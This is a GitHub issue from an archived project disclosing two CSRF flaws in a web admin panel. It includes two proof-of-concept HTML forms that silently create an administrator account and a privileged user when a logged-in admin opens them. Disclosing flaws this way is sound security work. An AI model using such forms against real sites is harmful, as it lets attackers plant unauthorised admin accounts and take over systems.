Skip to content
This repository was archived by the owner on Apr 14, 2021. It is now read-only.
This repository was archived by the owner on Apr 14, 2021. It is now read-only.

There is two CSRF vulnerability that can add the administrator account #20

Closed
@FiveAourThe

Description

@FiveAourThe

After the administrator logged in, open the following two page
poc:
add_admin.html

<html>
<form action="http://127.0.0.1/admin.php?m=Admin&c=manager&a=add" method="post">
	<div class="form-group">
		<label>用户名</label>
		<input class="form-control" type="text" name="username" value="csrf">
	</div>
	<div class="form-group">
		<label>邮箱</label>
		<input class="form-control" type="text" name="email" value="csrf@test.com">
	</div>
	<div class="form-group">
		<label>密码</label>
		<input class="form-control" type="password" name="password" value="123456">
	</div>
	<div class="form-group">
		<label>确认密码</label>
		<input class="form-control" type="password" name="repassword" value="123456">
	</div>
	<div class="form-group">
		<button class="btn btn-success" type="submit" >添加</button>
	</div>


</form>
</html>

add_user.html

<html>
<form action="http://127.0.0.1/admin.php?m=Admin&c=member&a=add" method="post">
	<div class="form-group">
		<label>用户名</label>
		<input class="form-control" type="text" name="username" value="test">
	</div>
	<div class="form-group">
		<label>邮箱</label>
		<input class="form-control" type="text" name="email" value="test@test.com">
	</div>
	<div class="form-group">
		<label>密码</label>
		<input class="form-control" type="password" name="password" value="123456">
	</div>
	<div class="form-group">
		<label>确认密码</label>
		<input class="form-control" type="password" name="repassword" value="123456">
	</div>
	<div class="form-group">
        <label>用户等级</label>
        <label class="radio-inline">
          <input type="radio" name="type" id="type" value="1" >路人
        </label>
        <label class="radio-inline">
          <input type="radio" name="type" id="type" value="2" >实习白帽子
        </label>
		<label class="radio-inline">
          <input type="radio" name="type" id="type" value="3" >普通白帽子
        </label>
        <label class="radio-inline">
          <input type="radio" name="type" id="type" checked="checked" value="4" >核心白帽子
        </label>
    </div>
	<div class="form-group">
        <label>用户状态</label>
        <label class="radio-inline">
          <input type="radio" name="status" id="status" value="0">禁止登陆
        </label>
        <label class="radio-inline">
          <input type="radio" name="status" id="status" value="1"  checked="checked">正常
        </label>
    </div>
	<div class="form-group">
		<button class="btn btn-success" type="submit" >添加</button>
	</div>


</form>
</html>

Metadata

Metadata

Labels

Projects

No projects

Milestone

No milestone

Relationships

None yet

Development

No branches or pull requests

Issue actions